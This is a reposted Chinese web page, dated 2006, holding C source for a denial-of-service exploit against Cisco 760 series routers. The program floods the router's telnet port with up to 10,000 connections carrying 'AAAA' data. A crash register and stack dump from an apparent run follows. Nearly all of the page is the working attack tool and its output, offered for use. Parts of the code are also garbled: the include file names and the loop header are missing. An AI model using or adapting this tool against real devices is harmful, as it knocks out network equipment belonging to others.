Cisco 760连接溢出问题
作者:caoner 来源:未知 添加时间:2006-5-21 14:50:35/* Cisco 760 Series Connection Overflow
*
*
* Written by: Tiz.Telesup
* Affected Systems: Routers Cisco 760 Series, I havn't tested anymore
* Tested on: FreeBSD 4.0 and Linux RedHat 6.0
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec);
void net_write (int fd, const char *str, ...);
unsigned long int net_resolve (char *host);
void
usage (void)
{
printf ("usage: ./cisco host times\n");
exit (EXIT_FAILURE);
}
int
main (int argc, char *argv[])
{
char host[256];
int port,times,count,sd = 0;
int m = 0;
struct sockaddr_in cs;
printf ("Cisco 760 series Connection Overflow.\n");
printf ("-------------------------------------\n");
if (argc < 3)
usage();
strcpy (host, argv[1]);
times=atoi (argv[2]);
if ((times < 1) || (times > 10000)) /*Maximum number of connections*/
usage();
port =23; /* This might be changed to the telnet port of the router*/
printf ("Host: %s Times: %d\n", host, times);
for (count=0;count printf ("Connecting... Connection number %d \n",count);
fflush (stdout);
sd = net_connect (&cs, host, port, NULL, 0, 30);
if (sd < 1) {
printf ("failed!\n");
exit (EXIT_FAILURE);
}
net_write (sd, "AAAA\n\n");
}
exit (EXIT_SUCCESS);
}
int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
if (!(cs->sin_addr.s_addr = net_resolve (server))) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i == -1) {
he = gethostbyname(host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
void
net_write (int fd, const char *str, ...)
{
char tmp[8192];
va_list vl;
int i;
va_start(vl, str);
memset(tmp, 0, sizeof(tmp));
i = vsnprintf(tmp, sizeof(tmp), str, vl);
va_end(vl);
send(fd, tmp, i, 0);
return;
}
这是利用该漏洞产生98个连接,然后发送大量的A字符给每个连接后的日志记录。
code=0x00050000 eva=0x0011E000 error=0x61 entries=1
EAX=00000000 EBX=000E2384 ECX=0000000D EDX=0010E4B8 DS=0030 ES=0038 SS=0040
ESI=0010E4B8 EDI=00000000 EBP=000E21DC ESP=000E21A8 CS=0028 EFL=00010246
Stack garbage ESP=000E21A8
120: 04000000 0006FF00 24A9FFFF[0003A921 0000A921 000E2158 04000000 000E2148
140: 00069B7F 0000000A 000E21D0 00016809 00000000 00127108 000E21F8 00064A23
160: 00000046 00000046 00000046 00268000 000E2190 00000082 00000006 00000082
180: 00000000 00128FE8 00128F98 FFFFFFFF 00045B6A 0000011C 0011C000 00000064
1A0: 00002402 00000006]0000000D 00050000 000571DF 00050028 00010246 00129086
Stack locals ESP=[000E21A8, 000E21D8]
1A0: 00002402 00000006[0000000D 00050000 000571DF 00050028 00010246 00129086
1C0: 0010E5F6 000452F8 0010E4B8 00000000 0010E4B8 FFFFFFFF 00000082]000E21F4
00058BD2: CALL|JMP ??? ESP=[000E21E4, 000E21F0]
1E0: 00058BD2[00128FA0 00000002 00000004 02128FA0]000E227C 0005763B 00128FA0
00057636: CALL 00058ADA ESP=[000E21FC, 000E2278]
1F0: 02128FA0 000E227C 0005763B[00128FA0 00000004 FFFFFFFF FFFFFFFF C0A80101
210: C0A80114 0018D706 00000000 00000017 00000000 0017098E 7DAF004A 00000000
230: 4D224000 05B40000 00000000 04000200 B4050402 FFFFFFFF FFFFFFFF C0A80101
250: 0011F298 0010D798 00000000 00000000 000E2284 00052D15 000E2300 00000018
00052B63: CALL|JMP ??? ESP=[000E2284, 000E22A4]
280: 00052B63[0010D7A8 000E2300 00000000 00000000 000B992E 00000000 000E22B0
2A0: 00045CC1 00000000]000E239C 00047E28 0010D7A8 000E2300 001157FC 00000000
00047E23: CALL 00052A1D ESP=[000E22B0, 000E2398]
2B0:[0010D7A8 000E2300 001157FC 00000000 C0A80101 000E2310 00127108 00000001
2D0: FFFFFFFF FFFFFFFF 000E2300 000199B1 000E2350 000ECD8A 00000002 000CA8D8
2F0: 00000000 00000000 000000F2 000ECD86 C0A80101 C0A80114 3C67002C 7AFF0000
310: 04000100 00064000 00C70028 38A30000 04000000 0006FE00 00000063 000E2344
00051BF1: CALL 00047745 ESP=[000E23A4, 000E23BC]
3A0: 00051BF6[0010D7A8 001157FC 00000000 13F94000 5000B250 BB8F3D04 000E0800]
00047728: CALL|JMP ??? ESP=[000E23C8, 000E23DC]
3C0: 000E23E0 00047728[0010D7A8 001157FC 00000000 0010D7A8 000B97AE 001157FC]
00040A51: CALL 0004764D ESP=[000E23E8, 000E23F4]
3E0: 000E23F8 00040A56[00000000 00000000 00000000 00009501]000E2400 0003F045
0003F045: CALL|JMP ??? ESP=[000E2400, 000E23FC]
400:[FFFFFFFF 00000001 000003A6 00000011 000001AB 00000000 00000000 00000000
00000001: CALL|JMP ??? ESP=[000E2408, FFFFFFFB]
400: FFFFFFFF 00000001[000003A6 00000011 000001AB 00000000 00000000 00000000
420: 00000000 00000000 000E7A58 000000DB FFFFFFFF 000B9C28 0011E9D0 00000000
440: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
460: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
站内搜索